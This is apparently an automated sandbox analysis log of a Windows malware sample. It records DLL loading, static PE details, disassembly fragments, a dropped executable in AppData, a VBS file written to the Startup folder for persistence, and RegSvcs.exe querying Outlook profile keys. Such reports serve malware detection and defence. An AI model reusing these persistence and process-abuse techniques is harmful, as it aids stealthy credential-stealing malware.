                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 3i1gMM8K4z.exeStatic file information: File size 1147904 > 1048576
                Source: 3i1gMM8K4z.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 3i1gMM8K4z.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 3i1gMM8K4z.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 3i1gMM8K4z.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 3i1gMM8K4z.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 3i1gMM8K4z.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 3i1gMM8K4z.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: ghauts.exe, 00000001.00000003.1766896164.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000001.00000003.1766621481.0000000003870000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920965524.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920393792.0000000004490000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ghauts.exe, 00000001.00000003.1766896164.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000001.00000003.1766621481.0000000003870000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920965524.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, ghauts.exe, 00000005.00000003.1920393792.0000000004490000.00000004.00001000.00020000.00000000.sdmp
                Source: 3i1gMM8K4z.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 3i1gMM8K4z.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 3i1gMM8K4z.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 3i1gMM8K4z.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 3i1gMM8K4z.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EE4B37 LoadLibraryA,GetProcAddress,0_2_00EE4B37
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F4848F push FFFFFF8Bh; iretd 0_2_00F48491
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0E70F push edi; ret 0_2_00F0E711
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0E828 push esi; ret 0_2_00F0E82A
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F08945 push ecx; ret 0_2_00F08958
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0EAEC push edi; ret 0_2_00F0EAEE
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F0EA03 push esi; ret 0_2_00F0EA05
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_0059C4C6 push A30059BAh; retn 0059h1_2_0059C50D
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005F848F push FFFFFF8Bh; iretd 1_2_005F8491
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BE70F push edi; ret 1_2_005BE711
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BE828 push esi; ret 1_2_005BE82A
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005B8945 push ecx; ret 1_2_005B8958
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BEA03 push esi; ret 1_2_005BEA05
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005BEAEC push edi; ret 1_2_005BEAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040BB97 push dword ptr [ecx-75h]; iretd 2_2_0040BBA3
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeFile created: C:\Users\user\AppData\Local\Okeghem\ghauts.exeJump to dropped file

                Boot Survival

                barindex
                Drops VBS files to the startup folder
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbsJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00EE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00EE48D7
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F65376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F65376
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_005948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_005948D7
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeCode function: 1_2_00615376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00615376
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F03187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F03187
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
